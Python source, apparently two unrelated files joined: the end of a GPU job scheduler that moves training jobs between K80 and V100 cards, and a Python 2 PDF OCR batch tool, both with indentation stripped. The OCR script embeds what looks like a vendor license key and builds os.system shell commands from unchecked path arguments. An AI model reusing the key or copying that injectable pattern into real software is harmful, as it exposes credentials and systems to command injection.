sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (host_node, 10002)
print('starting up on {} port {}'.format(*server_address))
sock.bind(server_address)
sock.listen(5)
while True:
# Wait for a connection
connection, client_address = sock.accept()
try:
while True:
data = connection.recv(32)
if data:
data_str = data.decode('utf-8')
global K80_start_time
global V100_start_time, promote_start_time
global K80_job
global v100_job
global K80_time
global V100_time
global ovhd_a, ovhd_b, ovhd_c, ovhd_d, k80_1st, v100_1st, ovhd_start, overhead, ovhd_total
global b_start, c_start, d_start, completion
if 'ckpt_qual' in data_str:
global ckpt_qual_dict
job_name = data_str.split(' ')[0]
ckpt_qual_dict[job_name] = 1
elif 'finish' in data_str:
global finish_dict
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
finish_dict[job_name] = 1
JCT[job] = int(time.time() - job_start[job])
if job in list(K80_job.values()):
K80_time[job] += int(time.time() - K80_start_time[job])
elif job in list(V100_job.values()):
V100_time[job] += int(time.time() - V100_start_time[job])
elif 'pid' in data_str:
global pid_dict
job_name = data_str.split(' ')[0]
pid = data_str.split(' ')[2]
pid_dict[job_name] = pid
elif 'checkpoint' in data_str: # can only be received after save signal is sent
global checkpoint_dict
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
checkpoint_dict[job_name] = 1
ovhd_a[job].append(int(time.time() - ovhd_start[job]))
b_start[job] = time.time()
elif 'waste' in data_str:
global epoch_waste_dict
job_name = data_str.split(' ')[0]
epoch_waste_time = data_str.split(' ')[2]
epoch_waste_dict[job_name] += int(epoch_waste_time)
elif 'b_end' in data_str:
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
ovhd_b[job].append(int(time.time() - b_start[job]))
c_start[job] = time.time()
elif 'c_end' in data_str:
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
ovhd_c[job].append(int(time.time() - c_start[job]))
d_start[job] = time.time()
elif 'd_end' in data_str:
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
ovhd_d[job].append(int(time.time() - d_start[job]))
ovhd_total[job].append(int(time.time() - ovhd_start[job]))
if ovhd_start[job] != 0:
overhead[job] += int(time.time() - ovhd_start[job])
ovhd_start[job] = 0
if job in list(K80_job.values()):
K80_start_time[job] = time.time()
elif job in list(V100_job.values()):
V100_start_time[job] = time.time()
promote_start_time[job] = time.time()
elif '1st_epoch' in data_str: # 'job50 1st_epoch 35'
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
epoch_time = int(data_str.split(' ')[2])
if job in list(K80_job.values()):
k80_1st[job].append(epoch_time)
elif job in list(V100_job.values()):
v100_1st[job].append(epoch_time)
elif 'completion' in data_str: # 'job50 completion 0.33'
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
completion_portion = float(data_str.split(' ')[2])
completion[job] = completion_portion
if 'ckpt_qual' in data_str or 'finish' in data_str or 'checkpoint' in data_str:
print('received ' + data_str)
connection.sendall(b'success')
#time.sleep(5)
else:
break
finally:
connection.close()
x = threading.Thread(target=thread_function, daemon=True)
x.start()
###############################################################################
######################################################################
while True:
# termination condition:
# all the jobs have finished
################### check for finished jobs on K80 and V100 ##############################
for gpu, job in K80_job.items():
if job != 'idle':
if finish_dict['job'+job] == 1:
K80_used -= 1
K80_job[gpu] = 'idle'
print('K80 finished job: ' + job)
for gpu, job in V100_job.items():
if job != 'idle':
if finish_dict['job'+job] == 1:
V100_used -= 1
V100_job[gpu] = 'idle'
print('V100 finished job: ' + job)
if job in demote_list:
demote_list.remove(job)
################ check step1 finished job of K80 jobs and step 2 of V100 #################
check_step1_complete(list(V100_job.values()), V100_node)
check_step2_complete(list(K80_job.values()), K80_node)
for job in list(V100_job.values()):
if job not in qualified_job and job != 'idle':
if job in step1_job:
kill_job(V100_node, job)
qualified_job.append(job)
print('job ' + job + ' has been qualified for demotion to K80')
time.sleep(3) # wait for run.sh to finish
x1, x3 = gpu_pwr.process_csv('job'+job)
x2 = 3600 / V100_epoch_time[job]
speedup_pred = model_V100.predict(np.array([x1, x2, x3]).reshape((1,-1)))[0] / 100
speedup_dict[job] = speedup_pred
predict_dict[job] = speedup_pred
check_step1_complete(list(K80_job.values()), K80_node)
check_step2_complete(list(V100_job.values()), V100_node)
for job in list(K80_job.values()):
if job not in qualified_job and job != 'idle':
if job in step1_job:
kill_job(K80_node, job)
qualified_job.append(job)
print('job ' + job + ' has been qualified for promotion to V100 for profiling')
time.sleep(3) # wait for run.sh to finish
x1, x3 = gpu_pwr.process_csv('job'+job)
x2 = 3600 / K80_epoch_time[job]
speedup_pred = model_K80.predict(np.array([x1, x2, x3]).reshape((1,-1)))[0] / 100
speedup_dict[job] = speedup_pred
predict_dict[job] = speedup_pred
############### start new jobs on idle K80s and V100s before promoting K80 jobs to idle V100 ################
if V100_used < V100_cap:
V100_free = V100_cap - V100_used
for i in range(V100_free):
time_passed = int(time.time() - queue_timer)
if index < len(queue) and queue_dict[queue[index]] < time_passed: # make sure job has arrived in the queue
job_new = str(queue[index])
for gpu, job in V100_job.items():
if job == 'idle': # schedule new job here if idle
start_job(V100_node, gpu, job_new)
birthplace[job_new] = V100_node
measure_job(V100_node, gpu, job_new)
V100_job[gpu] = job_new
job_start[job_new] = time.time()
V100_start_time[job_new] = time.time()
index += 1
V100_used += 1
time.sleep(5) # don't communicate too often
break
if K80_used < K80_cap:
K80_free = K80_cap - K80_used
for i in range(K80_free):
time_passed = int(time.time() - queue_timer)
if index < len(queue) and queue_dict[queue[index]] < time_passed: # make sure job has arrived in the queue
job_new = str(queue[index])
for gpu, job in K80_job.items():
if job == 'idle': # schedule new job here if idle
start_job(K80_node, gpu, job_new)
birthplace[job_new] = K80_node
measure_job(K80_node, gpu, job_new)
K80_job[gpu] = job_new
job_start[job_new] = time.time()
K80_start_time[job_new] = time.time()
index += 1
K80_used += 1
time.sleep(5) # don't communicate too often
break
################ make promotion decisions ########################
V100_free = V100_cap - V100_used
K80_free = K80_cap - K80_used
promote_list = [] #list(set(qualified_job).intersection(list(K80_job.values())).difference(pc_job))
for gpu, job in K80_job.items():
if job != 'idle':
if job in step2_job and len(ovhd_total[job]) > 0:
promote_list.append(job)
elif job not in step2_job and job in qualified_job and birthplace[job] == K80_node:
promote_list.append(job)
# print('job ' + job + 'qualified for promote for profiling')
# this returns job forced to be demoted. Currently in V100, and is practically complete
force_demote = list(set(list(V100_job.values())).intersection(pc_job))
# look at demote list
for gpu, job in V100_job.items():
if job != 'idle':
# for jobs who have finished profiling, added the job
if job not in demote_list and job in step2_job and len(ovhd_total[job]) > 0:
job_speedup = speedup_dict[job] # 0.7
job_ovhd = np.mean(ovhd_total[job]) # 100
k80_1st_ovhd = np.mean(k80_1st[job]) - K80_epoch_time[job]
v100_1st_ovhd = np.mean(v100_1st[job]) - V100_epoch_time[job]
demote_qualify_time = (2 * job_ovhd + k80_1st_ovhd + v100_1st_ovhd) / job_speedup
if int(time.time() - promote_start_time[job]) > demote_qualify_time:
demote_list.append(job)
print('job' + job + 'qualified for demote for passing demote qualify time ' +
str(int(demote_qualify_time)))
# for jobs who have not finished profiling, add the job if it's qualified and it started on V100
elif job not in demote_list and job not in step2_job and job in qualified_job and birthplace[job] == V100_node:
demote_list.append(job)
print('job ' + job + 'qualified for demote for profiling')
if len(promote_list) > 0 or len(demote_list) > 0:
promoted, demoted = max_speedup_promotion(K80_free, V100_free, V100_job, promote_list, demote_list, force_demote)
if len(promoted) > 0:
print('promoted jobs: ', promoted)
if len(demoted) > 0:
print('demoted jobs: ', demoted)
# stop all promoted jobs on K80
checkpoint_finish_check = []
for gpu, job in K80_job.items():
if job in promoted:
# make sure promoted step1 job doesn't get demoted back before finishing profiling
if job in step1_job and job not in step2_job:
speedup_dict[job] = 1
save_job(K80_node, job)
if finish_dict['job'+job] != 1:
K80_time[job] += int(time.time() - K80_start_time[job])
checkpoint_finish_check.append(job)
K80_job[gpu] = 'idle'
K80_used -= 1
# stop all demoted jobs on V100
for gpu, job in V100_job.items():
if job in demoted:
# make sure demoted step1 job doesn't get promoted back before finishing profiling
if job in step1_job and job not in step2_job:
speedup_dict[job] = 0.01
save_job(V100_node, job)
if finish_dict['job'+job] != 1:
V100_time[job] += int(time.time() - V100_start_time[job])
checkpoint_finish_check.append(job)
V100_job[gpu] = 'idle'
V100_used -= 1
demote_list.remove(job)
# wait for all GPUs to be available
if len(checkpoint_finish_check) > 0:
while True:
time.sleep(5)
for job in checkpoint_finish_check[:]:
if checkpoint_dict['job'+job] == 1: # checkpoint has finished, gpu is free
print(job + ' checkpointed successfully')
checkpoint_dict['job'+job] = 0 # reset it
checkpoint_finish_check.remove(job)
# also check if job already finished before sending checkpoint signal
elif finish_dict['job'+job] == 1:
print(job + ' finished before receiving checkpoint signal')
checkpoint_finish_check.remove(job)
if len(checkpoint_finish_check) == 0:
break
# resume promoted jobs on V100, make sure the gpu is idle
for job_new in promoted[:]:
if finish_dict['job'+job_new] != 1:
for gpu, job in V100_job.items():
if job == 'idle': # if gpu idle, schedule new job here
V100_job[gpu] = job_new
resume_job(V100_node, gpu, job_new)
num_mig[job_new] += 1
promoted.remove(job_new)
V100_used += 1
break
else: # job has already finished before checkpointing
promoted.remove(job_new)
# resume demoted jobs on K80, make sure the gpu is idle
for job_new in demoted[:]:
if finish_dict['job'+job_new] != 1:
for gpu, job in K80_job.items():
if job == 'idle': # if gpu idle, schedule new job here
resume_job(K80_node, gpu, job_new)
num_mig[job_new] += 1
K80_job[gpu] = job_new
demoted.remove(job_new)
K80_used += 1
break
else: # job has already finished before checkpointing
print('job'+job_new+' has finished before checkpointing')
demoted.remove(job_new)
# perform a check, make sure all promoted/demoted jobs are scheduled
if len(promoted) > 0 or len(demoted) > 0:
raise ValueError('Bug with promotion scheme, more jobs than free gpus')
############## monitor GPU usage ############
usage = K80_used + V100_used
time_stamp = int(time.time() - queue_timer)
gpu_usage_time.append(time_stamp)
gpu_usage.append(usage)
total_completion = np.sum(list(completion.values()))
gpu_usage_completion.append(total_completion)
############### wait for next iteration
time.sleep(INTERVAL)
################ check if termination condition is met ################
K80_idle_num = sum(value == 'idle' for value in K80_job.values())
V100_idle_num = sum(value == 'idle' for value in V100_job.values())
if K80_idle_num == K80_cap and V100_idle_num == V100_cap and index == len(queue):
print('all jobs are finished!')
break
# get average JCT
average_JCT = np.average(list(JCT.values()))
JCT['average'] = average_JCT
average_overhead = np.average(list(overhead.values()))
overhead['average'] = average_overhead
# after everything is finished
print('finished all runs')
JCT_name = testcase + '_JCT.json'
overhead_name = testcase + '_overhead.json'
num_mig_name = testcase + '_num_mig.json'
epoch_waste_name = testcase + '_epoch_waste.json'
ckpt_qual_name = 'ckpt_qual.json'
finish_name = 'finish.json'
K80_time_name = testcase + '_K80_time.json'
V100_time_name = testcase + '_V100_time.json'
gpu_usage_name = testcase + '_gpu_usage.csv'
ovhd_a_name = testcase + '_ovhd_a.json'
ovhd_b_name = testcase + '_ovhd_b.json'
ovhd_c_name = testcase + '_ovhd_c.json'
ovhd_d_name = testcase + '_ovhd_d.json'
ovhd_total_name = testcase + '_ovhd_total.json'
k80_1st_name = testcase + '_k80_1st.json'
v100_1st_name = testcase + '_v100_1st.json'
speedup_name = 'speedup.json'
predict_name = 'predict.json'
demote_list_name = 'demote_list.json'
completion_name = 'completion.json'
birthplace_name = testcase + '_birthplace.json'
with open(JCT_name, 'w') as fp1:
json.dump(JCT, fp1, sort_keys=True, indent=4)
with open(overhead_name, 'w') as fp3:
json.dump(overhead, fp3, sort_keys=True, indent=4)
with open(num_mig_name, 'w') as fp3:
json.dump(num_mig, fp3, sort_keys=True, indent=4)
with open(epoch_waste_name, 'w') as fp3:
json.dump(epoch_waste_dict, fp3, sort_keys=True, indent=4)
with open(ckpt_qual_name, 'w') as fp1:
json.dump(ckpt_qual_dict, fp1, sort_keys=True, indent=4)
with open(finish_name, 'w') as fp1:
json.dump(finish_dict, fp1, sort_keys=True, indent=4)
with open(K80_time_name, 'w') as fp3:
json.dump(K80_time, fp3, sort_keys=True, indent=4)
with open(V100_time_name, 'w') as fp3:
json.dump(V100_time, fp3, sort_keys=True, indent=4)
with open(ovhd_a_name, 'w') as fp3:
json.dump(ovhd_a, fp3, sort_keys=True, indent=4)
with open(ovhd_b_name, 'w') as fp3:
json.dump(ovhd_b, fp3, sort_keys=True, indent=4)
with open(ovhd_c_name, 'w') as fp3:
json.dump(ovhd_c, fp3, sort_keys=True, indent=4)
with open(ovhd_d_name, 'w') as fp3:
json.dump(ovhd_d, fp3, sort_keys=True, indent=4)
with open(ovhd_total_name, 'w') as fp3:
json.dump(ovhd_total, fp3, sort_keys=True, indent=4)
with open(k80_1st_name, 'w') as fp3:
json.dump(k80_1st, fp3, sort_keys=True, indent=4)
with open(v100_1st_name, 'w') as fp3:
json.dump(v100_1st, fp3, sort_keys=True, indent=4)
with open(speedup_name, 'w') as fp1:
json.dump(speedup_dict, fp1, sort_keys=True, indent=4)
with open(predict_name, 'w') as fp1:
json.dump(predict_dict, fp1, sort_keys=True, indent=4)
with open(demote_list_name, 'w') as fp1:
json.dump(demote_list, fp1, sort_keys=True, indent=4)
with open(completion_name, 'w') as fp1:
json.dump(completion, fp1, sort_keys=True, indent=4)
with open(birthplace_name, 'w') as fp1:
json.dump(birthplace, fp1, sort_keys=True, indent=4)
gpu_usage_time = np.asarray(gpu_usage_time)
gpu_usage = np.asarray(gpu_usage)
gpu_usage_completion = np.asarray(gpu_usage_completion)
rows = zip(gpu_usage_time, gpu_usage, gpu_usage_completion)
with open(gpu_usage_name, 'w') as f:
writer = csv.writer(f)
for row in rows:
writer.writerow(row)
|
ocr_asprise.py
|
#!/usr/bin/python
import os
import sys
import threading
import datetime
import logging
import os.path
from PyPDF2 import PdfFileWriter, PdfFileReader, PdfFileMerger
import traceback
from slugify import slugify
import subprocess
from PIL import Image
from asprise_ocr_api import *
import signal
import time
import random
from datetime import datetime
import shutil
import pdftotext
import re
import codecs
from xml.etree import ElementTree as et
import fnmatch
# pip install -t /project/env/lib/python2.7/dist-packages Pillow==4.0.0
# go to project and run this command: cp /ai/PDF-OCR-RTP/libs/asprise_lib/__init__.py env/lib/python2.7/dist-packages/asprise_ocr_api/
# Install gs
# Remember: install tesseract before running this tool
# env/lib/python2.7/site-packages/asprise_ocr_api/lib/libaocr_x64.so
params = sys.argv
# Setting configure
ghost_script = '/project/lib/ghost_script/bin/gs'
ghost_memory = 300000
timeout = 3
# python ocr_asprise.py file-ext=pdf output-type=TEXT-PDF source-path="/source/path" target-path="/target/path" output-log=output_log.txt rotate=false --help
# !/usr/bin/env python
# set variable
# thread_number = 1
source_path = ''
output_log = ''
target_path = ''
output_type = None
rotate = None
def sig_handler(signum, frame):
print "Segmentation fault occurred"
os.abort()
signal.signal(signal.SIGSEGV, sig_handler)
class ThreadPool(object):
'''
Create thread pool
Folling by: http://www.bogotobogo.com/python/Multithread/python_multithreading_Synchronization_Semaphore_Objects_Thread_Pool.php
'''
def __init__(self):
super(ThreadPool, self).__init__()
self.active = []
self.lock = threading.Lock()
def makeActive(self, name):
with self.lock:
self.active.append(name)
logging.debug('Running: %s', self.active)
def makeInactive(self, name):
with self.lock:
try:
self.active.remove(name)
except:
logging.warning('{} not in list'.format(name))
pass
logging.debug('Running: %s', self.active)
def get_thread_number_by_server_cores():
'''
Get thread number by the number of cores CPU
:return:
'''
import multiprocessing
thread_number = multiprocessing.cpu_count() - 1 if multiprocessing.cpu_count() > 1 else multiprocessing.cpu_count()
# thread_number = 100 # for testing
return thread_number
def show_help_syntax():
'''
Show the syntax command to ocr.
:return:
None
'''
print '\n'
print 'Following by syntax: python ocr_asprise.py file-ext=pdf output-type=TEXT-PDF source-path="/source/path" target-path="/target/path" output-log=output_log.txt rotate=false --help'
print '\n'
print 'ocr_asprise.py: the name of the tool'
print 'file-ext: file extension that you will crawl through to OCR'
print 'output-type: there are 3 options here: TEXT (output textfile only), TEXT-PDF (output textfile and PDF), PDF (output PDF only)'
print 'source-path: source where the directory you will need to crawl'
print 'target-path: where you will save the output, keep structure the same'
print 'output-log: path to output files'
print 'rotate: auto rotate the output true/false default false'
def get_params():
'''
Get all parameters from the command line
:return:
1 : success
0 : Use help param
-1 : something went wrong or lack some params
'''
required_params = ['file-ext', 'output-type', 'source-path', 'target-path', 'output-log']
p_dic = {}
if '--help' in params:
show_help_syntax()
return {'code': 0, 'data': None}
else:
print 'params is: {}'.format(params)
for p in params:
values = p.split('=')
try:
key = values[0]
value = values[1]
p_dic[key] = value
show_syntax = False
if key == 'output-log':
output_path = os.path.dirname(value)
if not os.path.exists(output_path):
# show_syntax = True
logging.info('Create new output dir: {}'.format(output_path))
mkdir_cm = 'mkdir -p {}'.format(output_path)
os.system(mkdir_cm)
if key == 'source-path':
if not os.path.exists(value):
show_syntax = True
if key == 'target-path':
if not os.path.exists(value):
logging.info('Create new target-path: {}'.format(value))
mkdir_cm = 'mkdir -p {}'.format(value)
os.system(mkdir_cm)
if show_syntax:
print 'The path {} does not exist. Please check it again'.format(key)
return {'code': -1, 'data': None}
except:
show_help_syntax()
pass
if set(required_params) < set(p_dic.keys()):
return {'code': 1, 'data': p_dic}
else:
return {'code': -1, 'data': None}
def get_number_of_pages(file_path):
'''
Get number of pages pdf
:param file_path:
:return:
0: something went wrong
number of pages: success
'''
num_pages = 0
with open(file_path, 'rb') as f:
try:
pdf_input = PdfFileReader(f, strict=False)
num_pages = pdf_input.getNumPages()
except:
logging.error('The file {} can\'t get number of pages.'.format(files_path))
pass
return num_pages
def convert_pdf_to_txt(path):
'''
Checking if a pdf is a non searchable
Following by: https://github.com/jalan/pdftotext
:param path: the path point to input file
:return:
1: is searachable
0: non searchable
'''
with open(path, "rb") as f:
pdf = pdftotext.PDF(f)
text = "\n\n".join(pdf)
# Read all the text into one string
tmp_text = re.sub('[^A-Za-z ]+ ', '@', text).replace(' ', '')
if tmp_text.strip():
special_character_number = len(re.findall('\@', tmp_text))
if special_character_number / float(len(tmp_text)) > 0.5:
return {'code': 0, 'text': ''}
return {'code': 1, 'text': text.strip()}
return {'code': 0, 'text': ''}
def detect_orientation(image_path):
def execute_and_rotate_image(cmd):
from subprocess import Popen, PIPE, STDOUT
popen = Popen(cmd, stderr=STDOUT, stdout=PIPE, shell=False)
out = popen.communicate()[0]
if 'Orientation in degrees:' in out:
try:
degrees = int(out.split('Orientation in degrees:', 1)[1].split('\n', 1)[0].strip())
except Exception as error:
traceback.print_exc()
degrees = 0
if degrees == 180:
# Rotate all images correctly
logging.info('The image {} will be rotate {} degree'.format(image_path, degrees))
# Load the original image:
img = Image.open(image_path)
img2 = img.rotate(degrees)
img2.save(image_path)
popen.stdout.close()
# return_code = popen.wait()
execute_and_rotate_image(
['tesseract', image_path, '-', '-psm', '0']
)
def write_log(log_file, search_file, status, error_message=''):
'''
Write the logs to log file
:param log_file:
:param search_file:
:param status:
1: success
0: blank
-1: failed
:return:
None
'''
timestamp = str(datetime.now())
if status == 1:
status = 'SUCCESS'
elif status == 0:
status = 'BLANK'
else:
status = 'ERROR'
with open(log_file, 'a') as f:
log = '[{}][{}][{}]: {}'.format(timestamp, status, error_message, search_file)
f.write(log)
f.write('\n')
def is_finish(dir, num_pages, ocr_type):
'''
Checking everything is finished?
:param dir:
:param num_pages: number pages of pdf file
:param ocr_type:
0:PDF,
1:PDF-TEXT,
2:TEXT
-1: XML
:return:
-0: failed
-1: success
'''
try:
if ocr_type == -1:
number_of_file_xml = len(fnmatch.filter(os.listdir(dir), '*.xml'))
if number_of_file_xml == num_pages:
return 1
return 0
else:
number_of_file_pdf = len(fnmatch.filter(os.listdir(dir), '*.pdf'))
number_of_file_txt = len(fnmatch.filter(os.listdir(dir), '*.txt'))
if ocr_type == 1:
if (number_of_file_pdf + number_of_file_txt) == num_pages * 2:
return 1
else:
if (number_of_file_pdf + number_of_file_txt) == num_pages:
return 1
return 0
except Exception as error:
traceback.print_exc()
return 0
def check_ocr_is_finish_by_file_path(file_name, dest_path, output_type):
'''
Check if the file has ocred or not?
:param file_name: the name of input file
:param dest_path:
:param output_type:
:return:
True: has ocred
False: not finised yet
'''
try:
_output_type = output_type.lower().split('-')
except:
pass
for o in _output_type:
if o == 'text':
o = 'txt'
if not os.path.exists('{}/{}.{}'.format(dest_path, file_name, o)):
return False
return True
def get_orc_engine_instance():
try:
Ocr.input_license("ent_SINGLE_2_Seats-Neubus-OS202800000800", "93513-5B34F-32BA4-FF1E4")
Ocr.set_up() # one time setup
ocrEngine = Ocr()
ocrEngine.start_engine("eng")
return ocrEngine
except:
traceback.print_exc()
return None
def combine_xml(files):
'''
Merge all xml files
:param files: list of xml file path
:return:
XML file
'''
first = None
for filename in files:
data = et.parse(filename).getroot()
if first is None:
first = data
else:
first.extend(data)
if first is not None:
return et.tostring(first)
def _process_xml(s, pool, fp, xml_out):
'''
Threading for processing xml when pdf file is a searchable pdf
:param s:
:param pool:
:param fp: path of input pdf file
:param xml_out: path of file xml
:return:
- None
'''
with s:
t_name = threading.currentThread().getName()
pool.makeActive(t_name)
try:
from multiprocessing.pool import ThreadPool
_pool = ThreadPool(processes=1)
async_result = _pool.apply_async(get_orc_engine_instance, ())
ocrEngine = async_result.get()
if not ocrEngine:
logging.error('Can\'t create new OCR engine instance.')
return 0
xml_data = ocrEngine.recognize(fp, -1, -1, -1, -1, -1,
OCR_RECOGNIZE_TYPE_TEXT, OCR_OUTPUT_FORMAT_XML,
PROP_IMG_PREPROCESS_TYPE='custom')
with codecs.open(xml_out, "w", encoding="utf-8") as f:
f.write(xml_data)
write_log(output_log, xml_out, 1)
except Exception as error:
traceback.print_exc()
write_log(output_log, xml_out, -1, str(error))
pool.makeInactive(t_name)
def _ocr_process_by_png_file(s, pool, fp, tmp_dir, pdf_name, output_type, output_log, number_of_pages, rotate=False,
delete_temp=False):
'''
Implement ocr for threading by png files
Following by: https://stackoverflow.com/questions/13657341/how-do-i-append-new-data-to-existing-xml-using-python-elementtree
:param s: threading use semaphore technique
:param pool: number of threads that run at a same time.
:return:
1: success
0: failed
'''
try:
_output_type = output_type.lower().split('-')
except:
pass
_time = 0
while (True):
try:
if _time > timeout:
logging.error('Something went wrong with pdf file: {}'.format(pdf_name))
return 0
with s:
t_name = threading.currentThread().getName()
pool.makeActive(t_name)
# Code here
temp_image_path = '{}/{}_{}.png'.format(tmp_dir, pdf_name, format(int(t_name), "06"))
searchable_pdf_path = '{}/{}_{}.pdf'.format(tmp_dir.rsplit('/', 1)[0], pdf_name,
format(int(t_name), "06"))
searchable_txt_path = '{}/{}_{}.txt'.format(tmp_dir.rsplit('/', 1)[0], pdf_name,
format(int(t_name), "06"))
tmp_xml_path = '{}/{}_{}.xml'.format(tmp_dir.rsplit('/', 1)[0], pdf_name, format(int(t_name), "06"))
_time = 0
while not os.path.exists(temp_image_path):
_time = _time + 1
if _time == timeout:
return 0 # timeout
time.sleep(_time)
# Following by: https://tpgit.github.io/Leptonica/readfile_8c_source.html
if os.stat(temp_image_path).st_size < 20:
time.sleep(1)
print ('Ocring pdf file is starting ... File path: %s' % searchable_pdf_path)
from multiprocessing.pool import ThreadPool
_pool = ThreadPool(processes=1)
async_result = _pool.apply_async(get_orc_engine_instance, ())
ocrEngine = async_result.get()
if not ocrEngine:
logging.error('Can\'t create new OCR engine instance.')
return 0
xml_data = None
if rotate:
detect_orientation(temp_image_path)
ocr_type = 0
time.sleep(random.uniform(0.1, 1.1))
if 'xml' in _output_type:
ocr_type = -1
xml_data = ocrEngine.recognize(temp_image_path, -1, -1, -1, -1, -1,
OCR_RECOGNIZE_TYPE_TEXT, OCR_OUTPUT_FORMAT_XML,
PROP_IMG_PREPROCESS_TYPE='custom',
PROP_IMG_PREPROCESS_CUSTOM_CMDS="scale(2);default()")
# Create xml file here
try:
xml_data = xml_data.replace('no="0"', 'no="{}"'.format(int(t_name) - 1))
if int(t_name) == 1:
xml_data = xml_data.replace(str(temp_image_path), str(fp))
with codecs.open(tmp_xml_path, "w", encoding="utf-8") as f:
f.write(xml_data)
write_log(output_log, tmp_xml_path, 1)
except Exception as error:
traceback.print_exc()
write_log(output_log, tmp_xml_path, -1, str(error))
if delete_temp:
xml_flag = True
_time_fs = 0
while not is_finish(tmp_dir.rsplit('/', 1)[0], number_of_pages, ocr_type):
_time_fs = _time_fs + 1
if _time_fs >= timeout * 5:
logging.error('Time out when processing ORC')
xml_flag = False
time.sleep(_time_fs)
tmp_xml_list = [
'{}/{}_{}.xml'.format(tmp_dir.rsplit('/', 1)[0], pdf_name, format(int(i + 1), "06")) for i
in range(number_of_pages)]
final_xml_data = combine_xml(tmp_xml_list)
if xml_flag:
try:
final_xml_path = '{}/{}.xml'.format(tmp_dir.rsplit('/', 2)[0], pdf_name)
with codecs.open(final_xml_path, "w", encoding="utf-8") as f:
f.write(final_xml_data)
write_log(output_log, final_xml_path, 1)
except Exception as error:
traceback.print_exc()
write_log(output_log, final_xml_data, -1, str(error))
else:
logging.ERROR('Can\'t create XML file, timeout occurred while waiting to merge xml file')
write_log(output_log, final_xml_data, -1, str(error))
if 'text' in _output_type and 'pdf' in _output_type:
ocr_type = 1
ocr_data = ocrEngine.recognize(temp_image_path, -1, -1, -1, -1, -1,
OCR_RECOGNIZE_TYPE_TEXT, OCR_OUTPUT_FORMAT_PDF,
PROP_PDF_OUTPUT_FILE=searchable_pdf_path,
PROP_PDF_OUTPUT_RETURN_TEXT='text',
PROP_IMG_PREPROCESS_TYPE='custom',
PROP_IMG_PREPROCESS_CUSTOM_CMDS="scale(2);default()",
PROP_PDF_OUTPUT_TEXT_VISIBLE=False)
# Create text file here
try:
with codecs.open(searchable_txt_path, "w", encoding="utf-8") as f:
f.write(ocr_data)
write_log(output_log, searchable_txt_path, 1)
write_log(output_log, searchable_pdf_path, 1)
except Exception as error:
write_log(output_log, searchable_txt_path, -1, str(error))
write_log(output_log, searchable_pdf_path, -1, str(error))
elif 'pdf' in _output_type:
ocr_type = 2
try:
ocrEngine.recognize(temp_image_path, -1, -1, -1, -1, -1,
OCR_RECOGNIZE_TYPE_TEXT, OCR_OUTPUT_FORMAT_PDF,
PROP_PDF_OUTPUT_FILE=searchable_pdf_path,
PROP_PDF_OUTPUT_RETURN_TEXT='text',
PROP_IMG_PREPROCESS_TYPE='custom',
PROP_IMG_PREPROCESS_CUSTOM_CMDS="scale(2);default()",
PROP_PDF_OUTPUT_TEXT_VISIBLE=False, )
# Write the result to the log file
write_log(output_log, searchable_pdf_path, 1)
except Exception as error:
write_log(output_log, searchable_pdf_path, -1, str(error))
elif 'text' in _output_type:
ocr_type = 3
ocr_data = ocrEngine.recognize(temp_image_path, -1, -1, -1, -1, -1,
OCR_RECOGNIZE_TYPE_TEXT, OCR_OUTPUT_FORMAT_PLAINTEXT,
PROP_IMG_PREPROCESS_TYPE='custom',
PROP_IMG_PREPROCESS_CUSTOM_CMDS="scale(2);default()")
# Create text file here
try:
with open(searchable_txt_path, 'w') as f:
ocr_data = u''.join(ocr_data).encode('utf-8').strip()
f.write(ocr_data)
write_log(output_log, searchable_txt_path, 1)
except Exception as error:
write_log(output_log, searchable_pdf_path, -1, str(error))
ocrEngine.stop_engine()
if delete_temp:
_time_fs = 0
while not is_finish(tmp_dir.rsplit('/', 1)[0], number_of_pages, ocr_type):
_time_fs = _time_fs + 1
if _time_fs >= timeout * 5:
logging.error('Time out when processing ORC')
return 0
time.sleep(_time_fs)
src_path = tmp_dir.rsplit('/', 1)[0]
dest_path = tmp_dir.rsplit('/', 2)[0]
merge_pdf_pages_and_text_file(src_path, dest_path, pdf_name)
# Remove tmp forder
logging.info('Remove the directory: {}'.format(tmp_dir))
shutil.rmtree(tmp_dir.rsplit('/', 1)[0])
pool.makeInactive(t_name)
return 1
except Exception as error:
traceback.print_exc()
# Write the result to the log file
write_log(output_log, searchable_pdf_path, -1, str(error))
pass
_time = _time + 1
def merge_pdf_pages_and_text_file(src_path, dest_path, pdf_name):
'''
Appending PDF files | text files to new one.
:param src_path:
:param dest_path:
:param pdf_name:
:return:
'''
# Merge pdf pages
merger = PdfFileMerger()
pdf_pages = []
for dirpath, dirnames, filenames in os.walk(src_path):
for filename in [f for f in filenames if f.endswith(".pdf")]:
pdf_pages.append(os.path.join(dirpath, filename))
if pdf_pages:
pdf_pages.sort()
for _file in pdf_pages:
print ('_file pdf is: {}'.format(_file))
merger.append(PdfFileReader(file(_file, 'rb')))
merger.write('{}/{}.pdf'.format(dest_path, pdf_name))
# Merges txt pages
txt_pages = []
for dirpath, dirnames, filenames in os.walk(src_path):
for filename in [f for f in filenames if f.endswith(".txt")]:
txt_pages.append(os.path.join(dirpath, filename))
if txt_pages:
txt_pages.sort()
for _file in txt_pages:
content = ''
print ('_file txt is: {}'.format(_file))
try:
with open(_file) as f:
content = str(f.readlines())
except:
logging.warning('Can\'t not get content of file: {}'.format(_file))
pass
if content:
with open('{}/{}.txt'.format(dest_path, pdf_name), 'a') as myfile:
myfile.write(u''.join(content).encode('utf-8').strip())
def run_tracking_file(output_type, source_path, target_path, output_log, rotate, ocr_all):
'''
Run tracking file
:param output_type:
:param source_path:
:param target_path:
:param output_log:
:param rotate:
:param ocr_all:
:return:
'''
# Get current path:
current_path = os.path.dirname(os.path.abspath(__file__))
# Start tracking file to monitor the OCR tool
try:
# Checking if the Asprise lib get stuck
pid = os.getpid()
file_ext = 'pdf'
run_tracking_cm = 'python {}/tracking.py {} {} {} {} {} {} {} {}'.format(
current_path,
pid,
file_ext,
output_type,
source_path,
target_path,
output_log,
rotate,
ocr_all,
).split(' ')
# os.system(run_tracking_cm)
from subprocess import call
call(run_tracking_cm)
except:
traceback.print_exc()
return 0
return 1
def orc_process(s, pool, files_path, source_path, target_path, output_type, output_log, rotate=False, ocr_all=False):
'''
Implement orc process
